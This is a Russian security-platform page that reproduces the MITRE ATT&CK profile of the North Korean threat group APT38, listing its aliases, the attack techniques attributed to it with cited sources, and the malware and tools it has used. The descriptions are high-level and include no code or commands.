Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.

APT38

APT38 is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, APT38 has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which APT38 stole $81 million, as well as attacks against Bancomext (Citation: FireEye APT38 Oct 2018) and Banco de Chile (Citation: FireEye APT38 Oct 2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.
ID: G0082
Associated Groups: BeagleBoyz, Stardust Chollima, Bluenoroff, Sapphire Sleet, COPERNICIUM, NICKEL GLADSTONE
Version: 3.1
Created: 29 Jan 2019
Last Modified: 22 Jan 2025

Associated Group Descriptions

Name Description
BeagleBoyz (Citation: CISA AA20-239A BeagleBoyz August 2020)
Stardust Chollima (Citation: CrowdStrike Stardust Chollima Profile April 2018)(Citation: CrowdStrike GTR 2021 June 2021)
Bluenoroff (Citation: Kaspersky Lazarus Under The Hood Blog 2017)
Sapphire Sleet (Citation: Microsoft Threat Actor Naming July 2023)
COPERNICIUM (Citation: Microsoft Threat Actor Naming July 2023)
NICKEL GLADSTONE (Citation: SecureWorks NICKEL GLADSTONE profile Sept 2021)

Techniques Used

Domain ID Name Use
Enterprise T1548 .002 Abuse Elevation Control Mechanism: Bypass User Account Control

APT38 has used the legitimate application `ieinstal.exe` to bypass UAC.(Citation: 1 - appv)

Enterprise T1583 .001 Acquire Infrastructure: Domains

APT38 has created fake domains to imitate legitimate venture capital or bank domains.(Citation: 1 - appv)

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.(Citation: FireEye APT38 Oct 2018)

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

APT38 has used PowerShell to execute commands and other operational tasks.(Citation: CISA AA20-239A BeagleBoyz August 2020)

.003 Command and Scripting Interpreter: Windows Command Shell

APT38 has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim’s machine.(Citation: FireEye APT38 Oct 2018) Additionally, APT38 has used batch scripts.(Citation: 1 - appv)

.005 Command and Scripting Interpreter: Visual Basic

APT38 has used VBScript to execute commands and other operational tasks.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: 1 - appv)

Enterprise T1543 .003 Create or Modify System Process: Windows Service

APT38 has installed a new Windows service to establish persistence.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1565 .001 Data Manipulation: Stored Data Manipulation

APT38 has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions.(Citation: FireEye APT38 Oct 2018)

.002 Data Manipulation: Transmitted Data Manipulation

APT38 has used DYEPACK to manipulate SWIFT messages en route to a printer.(Citation: FireEye APT38 Oct 2018)

.003 Data Manipulation: Runtime Data Manipulation

APT38 has used DYEPACK.FOX to manipulate PDF data as it is accessed to remove traces of fraudulent SWIFT transactions from the data displayed to the end user.(Citation: FireEye APT38 Oct 2018)

Enterprise T1561 .002 Disk Wipe: Disk Structure Wipe

APT38 has used a custom MBR wiper named BOOTWRECK to render systems inoperable.(Citation: FireEye APT38 Oct 2018)

Enterprise T1480 .002 Execution Guardrails: Mutual Exclusion

APT38 has created a mutex to avoid duplicate execution.(Citation: 1 - appv)

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

APT38 has unhooked DLLs to disable endpoint detection and response (EDR) or anti-virus (AV) tools.(Citation: 1 - appv)

.003 Impair Defenses: Impair Command History Logging

APT38 has prepended a space to all of their terminal commands to operate without leaving traces in the HISTCONTROL environment.(Citation: CISA AA20-239A BeagleBoyz August 2020)

.004 Impair Defenses: Disable or Modify System Firewall

APT38 have created firewall exemptions on specific ports, including ports 443, 6443, 8443, and 9443.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1070 .001 Indicator Removal: Clear Windows Event Logs

APT38 clears Window Event logs and Sysmon logs from the system.(Citation: FireEye APT38 Oct 2018)

.004 Indicator Removal: File Deletion

APT38 has used a utility called CLOSESHAVE that can securely delete a file from the system. They have also removed malware, tools, or other non-native files used during the intrusion to reduce their footprint or as part of the post-intrusion cleanup process.(Citation: FireEye APT38 Oct 2018)(Citation: CISA AA20-239A BeagleBoyz August 2020)

.006 Indicator Removal: Timestomp

APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1056 .001 Input Capture: Keylogging

APT38 used a Trojan called KEYLIME to capture keystrokes from the victim’s machine.(Citation: FireEye APT38 Oct 2018)

Enterprise T1036 .003 Masquerading: Rename Legitimate Utilities

APT38 has renamed system utilities, such as `rundll32.exe` and `mshta.exe`, to avoid detection.(Citation: 1 - appv)

.006 Masquerading: Space after Filename

APT38 has put several spaces before a file extension to avoid detection and suspicion.(Citation: 1 - appv)

Enterprise T1027 .002 Obfuscated Files or Information: Software Packing

APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium, to pack their implants.(Citation: FireEye APT38 Oct 2018)

Enterprise T1588 .002 Obtain Capabilities: Tool

APT38 has obtained and used open-source tools such as Mimikatz.(Citation: ESET Lazarus KillDisk April 2018)

Enterprise T1566 .001 Phishing: Spearphishing Attachment

APT38 has conducted spearphishing campaigns using malicious email attachments.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1053 .003 Scheduled Task/Job: Cron

APT38 has used cron to create pre-scheduled and periodic background jobs on a Linux system.(Citation: CISA AA20-239A BeagleBoyz August 2020)

.005 Scheduled Task/Job: Scheduled Task

APT38 has used Task Scheduler to run programs at system startup or on a scheduled basis for persistence.(Citation: CISA AA20-239A BeagleBoyz August 2020) Additionally, APT38 has used living-off-the-land scripts to execute a malicious script via a scheduled task.(Citation: 1 - appv)

Enterprise T1505 .003 Server Software Component: Web Shell

APT38 has used web shells for persistence or to ensure redundant access.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1518 .001 Software Discovery: Security Software Discovery

APT38 has identified security software, configurations, defensive tools, and sensors installed on a compromised system.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: 1 - appv)

Enterprise T1553 .005 Subvert Trust Controls: Mark-of-the-Web Bypass

APT38 has used ISO and VHD files to deploy malware and to bypass Mark-of-the-Web (MOTW) security measures.(Citation: 1 - appv)

Enterprise T1218 .001 System Binary Proxy Execution: Compiled HTML File

APT38 has used CHM files to move concealed payloads.(Citation: Kaspersky Lazarus Under The Hood APR 2017)

.005 System Binary Proxy Execution: Mshta

APT38 has used a renamed version of `mshta.exe` to execute malicious HTML files.(Citation: 1 - appv)

.007 System Binary Proxy Execution: Msiexec

APT38 has used `msiexec.exe` to execute malicious files.(Citation: 1 - appv)

.011 System Binary Proxy Execution: Rundll32

APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: 1 - appv)

Enterprise T1569 .002 System Services: Service Execution

APT38 has created new services or modified existing ones to run executables, commands, or scripts.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1204 .001 User Execution: Malicious Link

APT38 has used links to execute a malicious Visual Basic script.(Citation: 1 - appv)

.002 User Execution: Malicious File

APT38 has attempted to lure victims into enabling malicious macros within email attachments.(Citation: CISA AA20-239A BeagleBoyz August 2020) Additionally, APT38 has used malicious Word documents and shortcut files.(Citation: 1 - appv)

Software

ID Name References Techniques
S0039 Net (Citation: FireEye APT38 Oct 2018) (Citation: Microsoft Net Utility) (Citation: Savill 1999) Password Policy Discovery, Domain Groups, System Time Discovery, Domain Account, Local Account, System Service Discovery, Remote System Discovery, Network Share Discovery, System Network Connections Discovery, Network Share Connection Removal, Service Execution, Local Account, Additional Local or Domain Groups, Local Groups, SMB/Windows Admin Shares, Domain Account
S0376 HOPLIGHT (Citation: CISA AA20-239A BeagleBoyz August 2020) (Citation: US-CERT HOPLIGHT Apr 2019) Device Driver Discovery, Modify Registry, Fallback Channels, Query Registry, Proxy, Non-Standard Port, Commonly Used Port, Pass the Hash, File and Directory Discovery, Security Account Manager, Windows Command Shell, Exfiltration Over C2 Channel, Standard Encoding, System Information Discovery, Windows Management Instrumentation Event Subscription, Service Execution, Ingress Tool Transfer, Windows Management Instrumentation, Uncommonly Used Port, Disable or Modify System Firewall, System Time Discovery, Process Injection
S0334 DarkComet (Citation: DarkKomet) (Citation: FireEye APT38 Oct 2018) (Citation: FYNLOS) (Citation: Fynloski) (Citation: Krademok) (Citation: Malwarebytes DarkComet March 2018) (Citation: TrendMicro DarkComet Sept 2014) Command and Scripting Interpreter, Clipboard Data, Video Capture, System Information Discovery, Ingress Tool Transfer, Process Discovery, Windows Command Shell, Disable or Modify System Firewall, Remote Desktop Protocol, Registry Run Keys / Startup Folder, Web Protocols, Audio Capture, Disable or Modify Tools, Software Packing, Modify Registry, Keylogging, System Owner/User Discovery, Match Legitimate Resource Name or Location
S0002 Mimikatz (Citation: Adsecurity Mimikatz Guide) (Citation: Deply Mimikatz) (Citation: FireEye APT38 Oct 2018) DCSync, Credentials from Password Stores, Rogue Domain Controller, Private Keys, SID-History Injection, Security Support Provider, Pass the Hash, Account Manipulation, Pass the Ticket, Credentials from Web Browsers, Golden Ticket, Security Account Manager, LSASS Memory, Silver Ticket, Windows Credential Manager, Steal or Forge Authentication Certificates, LSA Secrets
S0607 KillDisk (Citation: ESEST Black Energy Jan 2016) (Citation: ESET Lazarus KillDisk April 2018) (Citation: KillDisk Ransomware) (Citation: Trend Micro KillDisk 1) (Citation: Trend Micro KillDisk 2) File and Directory Discovery, Native API, System Information Discovery, Shared Modules, Process Discovery, Obfuscated Files or Information, Service Stop, Clear Windows Event Logs, System Shutdown/Reboot, Disk Structure Wipe, Data Encrypted for Impact, File Deletion, Masquerade Task or Service, Access Token Manipulation, Data Destruction
S0593 ECCENTRICBANDWAGON (Citation: CISA AA20-239A BeagleBoyz August 2020) (Citation: CISA EB Aug 2020) File Deletion, Obfuscated Files or Information, Windows Command Shell, Screen Capture, Keylogging, Local Data Staging

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.